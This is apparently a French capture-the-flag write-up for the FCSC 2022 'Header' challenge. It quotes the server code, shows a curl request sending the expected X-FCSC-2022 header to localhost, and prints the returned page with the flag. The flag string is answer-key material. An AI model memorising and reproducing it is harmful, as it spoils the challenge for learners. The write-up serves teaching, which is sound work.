Le code de la page /source fourni nous apprend que lorsque l’on visite la page d’accueil, le serveur vérifie s’il existe dans la requête envoyée le Header: X-FCSC-2022 avec sa valeur "Can I get a flag, please?", si c’est le cas, il ouvre le fichier flag.txt et nous renvoie le flag.
var verif = req.header("X-FCSC-2022");
if (verif == "Can I get a flag, please?") {
var flag = fs.readFileSync("flag.txt");
res.status(200);
res.render("pages/index", {
type: "success",
msg: "Here it is: " + flag,
});
return res.end();
}
Nous faisons donc un curl en passant le header et la donnée attendue :
curl --header "X-FCSC-2022:Can I get a flag, please?" localhost:8000
Le retour renvoi la page avec le flag.
<html>
<head>
<meta charset="UTF-8">
<title>Header</title>
<link rel="stylesheet" href="/bootstrap.css" />
<link rel="stylesheet" href="/style.css" />
<link rel="stylesheet" href="/prism.css" />
</head>
<body>
<nav class="navbar navbar-expand-lg navbar-dark bg-primary fixed-top">
<a class="navbar-brand" href="/">Header</a>
<button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarColor01" aria-controls="navbarColor01" aria-expanded="false" aria-label="Toggle navigation">
<span class="navbar-toggler-icon"></span>
</button>
<div class="collapse navbar-collapse" id="navbarColor01">
<ul class="navbar-nav">
<li class="nav-item">
<a class="nav-link" href="/source">Source</a>
</li>
</ul>
<br/>
</div>
</nav>
<div class="container">
<div class="starter-template">
<div id="alert" class="alert alert-success">
<strong>Here it is: FCSC{9ec57a4a72617c4812002726750749dd193d5fbbfeef54a27a9b536f00d89dfb}</strong>
</div>
<img src="meme.jpeg" class="img-fluid" />
</div>
</div>
<script src="https://cdnjs.cloudflare.com/ajax/libs/prism/1.27.0/prism.min.js" integrity="sha512-/Swpp6aCQ0smuZ+zpklJqMClcUlvxhpLf9aAcM7JjJrj2waCU4dikm3biOtMVAflOOeniW9qzaNXNrbOAOWFCw==" crossorigin="anonymous" referrerpolicy="no-referrer"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" integrity="sha512-894YE6QWD5I59HgZOGReFYm4dnWc1Qt5NtvYSaNcOP+u1T9qYdvdihz0PPSiiqn/+/3e7Jo4EaG7TubfWGUrMQ==" crossorigin="anonymous"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/2.9.1/umd/popper.min.js" integrity="sha512-g2PN+aYR0KupTVwea5Ppqw4bxWLLypWdd+h7E0ydT8zF+/Y2Qpk8Y1SnzVw6ZCVJPrgB/91s3VfhVhP7Y4+ucw==" crossorigin="anonymous"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.6.0/js/bootstrap.min.js" integrity="sha512-XKa9Hemdy1Ui3KSGgJdgMyYlUg1gM+QhL6cnlyTe2qzMCYm4nAZ1PsVerQzTTXzonUR+dmswHqgJPuwCq1MaAg==" crossorigin="anonymous"></script>
</body>
</html>